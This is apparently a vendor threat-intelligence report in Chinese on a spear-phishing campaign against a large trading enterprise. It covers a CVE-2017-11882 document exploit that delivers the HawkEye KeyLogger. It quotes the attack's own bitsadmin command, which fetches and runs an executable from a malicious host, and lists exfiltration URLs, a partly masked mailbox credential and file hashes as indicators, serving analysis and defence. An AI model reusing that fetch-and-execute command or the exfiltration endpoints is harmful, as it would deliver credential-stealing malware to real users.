腾讯御点截获针对某大型商贸企业的定向商业APT攻击

2019-07-30 11:08:04
腾讯御见威胁情报中心接到某大型企业客户反馈,相关工作人员称:“在企业内网部署腾讯御点客户端后,管理员在微信端接收到恶意邮件攻击拦截的告警信息”。腾讯安全专家确认该事件为一起典型的针对我国大型企业网络的一次精准鱼叉邮件攻击事件。

概述

近日,腾讯御见威胁情报中心接到某大型企业客户反馈,相关工作人员称:“在企业内网部署腾讯御点客户端后,管理员在微信端接收到恶意邮件攻击拦截的告警信息”。该部门管理员表示,由于担心是否真的遭遇恶意攻击,也不确定是否存在误拦截报警,为确保企业内网安全不受威胁,遂与腾讯御见威胁情报中心取得联系寻求帮助。

经腾讯安全专家查看拦截告警信息,对告警进行深入溯源,确认该事件为一起典型的针对我国大型企业网络的一次精准鱼叉邮件攻击。攻击者试图通过伪造某公司韩国分部的业务往来邮件投递信息窃取木马,当受害用户试图访问邮件附件的doc文档时,攻击文档会利用CVE-2017-11882漏洞下载HawkEye KeyLogger后门程序并执行,这一危险动作被腾讯御点终端安全管理系统成功拦截。

一段时间以来,随着中国国际地位的不断上升,针对中国大型企业网络的APT攻击频繁发生,已引起中国官方的高度重视。“没有网络安全,就没有国家安全”已是各级政府机关、企业事业单位领导层的共识。作为执行一带一路国家战略的重点商贸企业,与世界各地合作伙伴有频繁的业务往来,为防御境外黑客有组织的攻击行为,通过招标采购,最终全网采用腾讯安全大脑整体安全解决方案。

针对此次攻击,腾讯御点终端威胁管理系统成功检测威胁并及时拦截,并通过部署在企业内网的腾讯御界高级威胁检测系统回溯攻击线索,了解全局安全状况,及时发现内网薄弱环节,工程师根据相关系统日志最终完成事件定性,使腾讯安全大脑的整体防御能力在实战中得到验证。

 

该攻击团伙图谱信息如下

技术分析

1. 攻击流程分析

首先发送钓鱼邮件,该钓鱼邮件携带带毒的doc附件。

由于恶意邮件起始发件方韩国某公司与被攻击企业确有业务来往,公司内A员工收到邮件后以转发的形式发送给了负责相关工作的B同事。B同事在接收到A同事的转发邮件后,也并未怀疑此邮件的风险性,并打开了恶意doc文档。

 

Doc附件正文内容如下

Doc附件的漏洞二进制内容

Doc文档运行后使用CVE-2017-11882进一步执行恶意命令拉取big.exe执行:

cmd.exe /c bitsadmin /transfer YA /priority foreground http://innovarefining.club/Abiguy/big.exe %USERPROFILE%/Hjb.exe && start %USERPROFILE%/Hjb.exe

 

拉取后的big.exe本质为一个经过混淆的C# Loader装载模块

最终在内存中解密资源装载执行

Dump后的文件同样为C#混淆模块

去混淆后观察该文件为HawkEye KeyLogger V9模块

HawkEye KeyLogger 从资源中RCDATA中解密出配置信息

配置资源使用AES方式加密

解密Key为硬编码数据

 

解密配置后观察可知,该木马功能丰富,具备反安全软件,反调试等功能。

通过配置文件也可知该木马当前收信邮箱地址

EmailUsername ="alejandroxxxxxx@xxxxxxxsquero.com"

EmailPassword ="LAURENCEXXXXX"

 

2. payload分析

HawkEye Keylogger早在2016年就已出现,是一个典型的窃密类型的商业木马。

腾讯安全多次披露利用该木马实施的攻击行为,具体详细分析可参考腾讯安全历史发布文章:

https://www.freebuf.com/column/157857.html

 

其主要功能如下:

收集机器信息

使用映像劫持的方式尝试禁用杀软(根据配置可知,该功能当前并未开启)

获取剪切板,截屏,摄像头信息

截屏信息上传到如下url

hxxp://pomf.cat/upload.php

hxxps://a.pomf.cat/

键盘记录功能

 

盗取ftp或邮箱的密码

 

盗取MineCraft游戏密码

安全建议

1、建议不要打开不明来源的邮件附件;除非非常清楚文档来源可靠,否则建议不要启用Office执行宏代码;

2、及时安装系统补丁和重要软件的补丁;

3、使用杀毒软件防御可能的病毒木马攻击,建议全网安装御点终端安全管理系统

https://s.tencent.com/product/yd/index.html)。御点终端安全管理系统具备终端杀毒统一管控、修复漏洞统一管控,以及策略管控等全方位的安全管理功能,可帮助企业管理者全面了解、管理企业内网安全状况、保护企业安全。

4、使用腾讯御界高级威胁检测系统,及时发现APT攻击的蛛丝马迹。腾讯御界高级威胁检测系统,是基于腾讯安全反病毒实验室的安全能力、依托腾讯在云和端的海量数据,研发出的独特威胁情报和恶意检测模型系统。更多信息可参考官方网站(https://s.tencent.com/product/yujie/index.html

IOCs

MD5:

32739957c3c6a975ace35ddfa4e5bc23

405d90d4111108d7a307ce4034fd5844

d9d63a5aa1d51cd887e2a9df97f538b1


URL:

hxxp://pomf.cat/upload.php

hxxps://a.pomf.cat/

hxxp://innovarefining.club/Abiguy/big.exe


参考资料

1.账单明细PPT暗藏玄机:HawkEye Keylogger木马分析

https://www.freebuf.com/column/157857.html

 

2. 中国进出口企业遭遇大规模“商贸信”攻击 企业机密被窃取

https://s.tencent.com/research/report/484.html

最新资讯